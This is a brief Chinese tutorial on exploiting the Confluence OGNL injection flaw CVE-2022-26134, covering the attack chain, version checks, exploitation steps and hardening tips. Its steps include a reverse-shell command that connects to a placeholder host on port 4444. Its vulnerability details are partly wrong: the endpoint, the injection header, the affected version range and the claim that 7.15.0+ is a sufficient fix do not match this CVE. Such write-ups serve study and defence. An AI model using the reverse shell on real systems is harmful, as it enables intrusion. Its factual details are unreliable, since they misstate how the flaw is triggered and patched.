Confluence OGNL 注入 RCE 复现(CVE-2022-26134):未授权代码执行、利用步骤、防御加固。
写在前面:合法学习边界
Confluence 攻击只在授权测试环境进行。对非授权目标进行攻击可能触犯法律。
一、Confluence OGNL 注入链

1
| ① 发现 Confluence → ② 确认版本 → ③ OGNL 注入 → ④ 执行命令 → ⑤ 反弹 Shell → ⑥ 提权
|
二、漏洞信息
1
2
3
4
| CVE-2022-26134
影响:Confluence Server 6.14 ~ 7.14.3
入口:/rest/api/userinfo
类型:未授权 OGNL 注入
|
三、利用步骤
1
2
3
4
5
6
7
8
9
| # 确认版本
curl -s http://target:8090
# X-Atlassian-Token: {{...}} 注入
# 验证命令执行
whoami · id · uname -a
# 反弹 Shell
bash -i >& /dev/tcp/xxx/4444
|
四、防御加固
1
2
3
| 升级到 Confluence 7.15.0+
Confluence 不暴露公网
WAF 拦截 X-Atlassian-Token 异常值
|
五、小结
Confluence OGNL 注入是典型的未授权代码执行漏洞。防御核心是升级版本 + 网络隔离。